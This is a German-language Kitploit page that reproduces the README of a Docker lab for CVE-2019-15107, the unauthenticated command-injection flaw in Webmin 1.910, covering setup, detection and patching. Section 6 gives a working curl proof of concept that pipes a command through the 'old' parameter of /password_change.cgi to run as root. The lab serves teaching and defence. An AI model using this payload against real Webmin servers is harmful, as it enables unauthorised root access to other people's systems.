Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2019-15107-lab — Docker-basiertes Lab zur Demonstration von CVE-2019-15107, der nicht authentifizierten RCE in Webmin, inklusive Deployment, Ausnutzung, Erkennung und Behebung. | Kitploit
Tools/GitHubGitHub/shambhavim18/cve-2019-15107-lab
DefensivwerkzeugeContainer-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
GitHub
shambhavim18/cve-2019-15107-lab

cve-2019-15107-lab

Docker-basiertes Lab zur Demonstration von CVE-2019-15107, der nicht authentifizierten RCE in Webmin, inklusive Deployment, Ausnutzung, Erkennung und Behebung.

Repository anzeigen
vor 8h 57mNoch nicht geprüft
Teilen

CVE-2019-15107 – Webmin Unauthenticated RCE Lab

1. Projektübersicht

Dieses Projekt demonstriert CVE-2019-15107, eine kritische Remote-Code-Execution-(RCE-)Schwachstelle in Webmin, innerhalb einer kontrollierten und isolierten Docker-Umgebung. Das Lab deckt den vollständigen Lebenszyklus der Schwachstelle ab, von der Bereitstellung und Ausnutzung bis hin zur Erkennung und Behebung.

2. Voraussetzungen & Umgebungsanforderungen

Voraussetzungen-

1.Docker Desktop (installiert und ausgeführt)
2.Docker Compose
3.Terminal / PowerShell mit curl.exe-Unterstützung

UmgebungsanforderungenOS: Windows / Linux / mac-

1.OS (Lokale Host-Umgebung)

2.Port-Verfügbarkeit: Port 10000 muss auf dem Host-Rechner frei sein.

3. Verwundbare Anwendung & Version

1.Anwendung: Webmin
2.Verwundbare Version: 1.910 (Betroffene Versionen: 1.880 bis 1.920)
3.Korrigierte/Gepatchte Version: 1.930 und höher
4.Schwachstellentyp: Unsachgemäße Neutralisierung spezieller Elemente, die in einem Betriebssystembefehl verwendet werden (CWE-78) 5.CVSS-Score: 9.8 (Kritisch)


4. Installations- & Einrichtungsschritte

1.Klonen oder laden Sie dieses Projekt-Repository auf Ihren lokalen Rechner herunter.

2.Öffnen Sie Ihr Terminal und navigieren Sie zum Projektverzeichnis, das die docker-compose.yml enthält.

3.Stellen Sie sicher, dass Docker Desktop auf Ihrem System aktiv ist.

5. Wie man das Lab startet und stoppt

Wie man das Lab startet-

Führen Sie den folgenden Befehl aus dem Projektstammverzeichnis aus, um den verwundbaren Container im Detached-Modus abzurufen und zu starten: docker-compose up -d

Sie können den Container-Status überprüfen, indem Sie Folgendes ausführen: docker compose ps

Greifen Sie in Ihrem Webbrowser auf die Anwendungsschnittstelle zu unter: https://localhost:10000 (akzeptieren Sie die lokale SSL-Zertifikatswarnung).

Wie man das Lab stoppt-

Um die laufende Container-Umgebung zu stoppen und zu entfernen, führen Sie Folgendes aus: docker-compose down

6. Wie man die Schwachstelle ausnutzt

Die Schwachstelle befindet sich im unauthentifizierten Passwortänderungs-Endpunkt (/password_change.cgi), bei dem Eingabeparameter ohne ordnungsgemäße Bereinigung direkt an die System-Shell übergeben werden.

Führen Sie den folgenden Befehl in Ihrem Terminal (PowerShell/Bash) aus, um einen Diagnosebefehl (id) als Proof-of-Concept auszuführen:

curl.exe -k https://localhost:10000/password_change.cgi -e "https://localhost:10000" -d "user=root&pam=&old=test|id&new1=test&new2=test"

7. Erwartete Ergebnisse

Erfolgreiche Ausnutzung: Der Server verarbeitet das injizierte Pipe-Zeichen (|) und löst eine unauthentifizierte Befehlsausführung mit Root-Rechten aus. Das Terminal gibt HTML-Antwortnachweise zusammen mit dem Container-Shell-Feedback (uid=0(root)) aus, was die erfolgreiche Remote-Code-Execution bestätigt.

8. Wie man den Erkennungsmechanismus ausführtDie Erkennung dieser Schwachstelle kann durch Folgendes erfolgen:

1.Versionsidentifikation: Überprüfen der Version der laufenden Webmin-Instanz, um festzustellen, ob sie im verwundbaren Bereich (1.880 bis 1.920) liegt.

2.Netzwerk-/Protokollüberwachung: Überprüfen der Webserver-Zugriffs- oder WAF-Protokolle auf eingehende HTTP-POST-Anfragen an /password_change.cgi, die verdächtige Shell-Steuerzeichen (wie | oder ;) innerhalb von Parameterwerten enthalten.

9. Behebung

Um CVE-2019-15107 abzuschwächen und zu beheben:

1.Upgrade: Aktualisieren Sie Webmin auf Version 1.930 oder höher, die Eingaben, die an die zugrunde liegenden Module übergeben werden, ordnungsgemäß bereinigt.

2.Zugriffskontrolle: Beschränken Sie den Netzwerkzugriff auf Port 10000 mithilfe von Firewalls oder VPN-Tunneln, um eine direkte Exposition gegenüber nicht vertrauenswürdigen Netzwerken zu verhindern.

10. Fehlerbehebungshinweise

1.Docker-Daemon läuft nicht: Wenn Verbindungsfehler auftreten, stellen Sie sicher, dass Docker Desktop vollständig gestartet ist, und überprüfen Sie dies mit docker version.

2.Portkonflikt (10000 bereits in Verwendung): Stellen Sie sicher, dass keine andere lokale Anwendung oder kein anderer Dienst Port 10000 belegt.

3.PowerShell-curl-Syntaxfehler: Verwenden Sie curl.exe anstelle von Standard-curl in Windows PowerShell, um Parameterzuordnungsprobleme mit dem integrierten Invoke-WebRequest-Alias von PowerShell zu vermeiden.

Tool herunterladen